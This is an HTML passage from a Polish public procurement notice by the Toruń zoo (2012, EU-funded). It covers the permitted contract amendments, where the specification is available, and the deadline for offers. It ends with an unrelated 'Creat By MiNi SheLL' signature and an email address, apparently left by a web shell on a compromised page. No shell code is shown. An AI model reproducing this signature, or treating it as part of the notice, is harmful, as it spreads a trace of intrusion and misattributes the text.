<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	W przypadkach przewidzianych w umowie dopuszcza się wprowadzenie zmian za zgodą stron umowy.

2.	Zmiany mogą być inicjowane przez Zamawiającego lub przez Wykonawcę.

3.	Dopuszczalne jest dokonanie zmian umowy:
1)	jeżeli zmiana umowy będzie korzystna dla Zamawiającego i w szczególności dotyczyć będzie:
a)	zmiany technologii  wykonawstwa w stosunku do przewidzianej w dokumentacji projektowej,
b)	zamiany materiałów przewidzianych do wykonania robót w stosunku do materiałów przewidzianych w  dokumentacji projektowej,
c)	innych nie wymienionych zmian korzystnych dla Zamawiającego,

2)	jeżeli zmiana umowy dotyczyć będzie zmiany terminu wykonania przedmiotu   zamówienia z przyczyn niezależnych od obu stron, które w szczególności dotyczyć będą:
a)	warunków pogodowych uniemożliwiających wykonywanie prac w wymaganych temperaturach  zewnętrznych,
b)	uwarunkowań formalno-prawnych, w szczególności dotyczących wprowadzenia zmian do dokumentacji projektowej na etapie wykonawstwa robót z przyczyn niezależnych od obu stron,

3)	jeżeli zmiana umowy dotyczyć będzie konieczności wprowadzenia do zakresu przedmiotu umowy ewentualnych robót dodatkowych nie objętych zamówieniem podstawowym w ramach zamówień dodatkowych lub uzupełniających (w tym dotyczących zmiany technologii  wykonawstwa w stosunku do przewidzianej w dokumentacji projektowej lub  zamiany materiałów przewidzianych do wykonania robót w stosunku do materiałów przewidzianych w  dokumentacji projektowej, rozszerzenia zakresu rzeczowego przedmiotu zamówienia o elementy zawarte w projekcie będące przedmiotem następnego etapu inwestycji),  których nie można było przewidzieć w  chwili zawarcia umowy i dla których ustalenie wysokości i sposobu zapłaty wynagrodzenia odbędzie się  na zasadach określonych  w §  8  ust. 6,

4)	jeżeli zmiana umowy dotyczyć będzie zmiany składu osobowego zespołu inspektorów nadzoru inwestorskiego, z przyczyn niezależnych od obu stron.  

4.	Jeżeli zmiana umowy wymaga zmiany dokumentacji projektowej lub specyfikacji technicznej wykonania i odbioru robót budowlanych, strona inicjująca zmianę przedstawi:
-	projekt zamienny zawierający opis proponowanej zmiany wraz z  informacją o konieczności zmiany pozwolenia na budowę,
-	przedmiar i niezbędne rysunki.

5.	Do każdej propozycji zmiany, inicjujący zmianę przedstawi: 
-	opis propozycji zmiany, w tym wpływ na terminy wykonania,
-	uzasadnienie zmiany,
-	obliczenia uzasadniające ewentualną zmianę wynagrodzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoo.torun.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ogród Zoobotaniczny w Toruniu ul. Bydgoska 7; 87-100 Toruń- sekretariat ..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.03.2012 godzina 10:00, miejsce: Ogród Zoobotaniczny w Toruniu ul. Bydgoska 7; 87-100 Toruń- sekretariat ..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Regionalny Program Operacyjny Województwa Kujawsko-Pomorskiego na lata 2007-2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com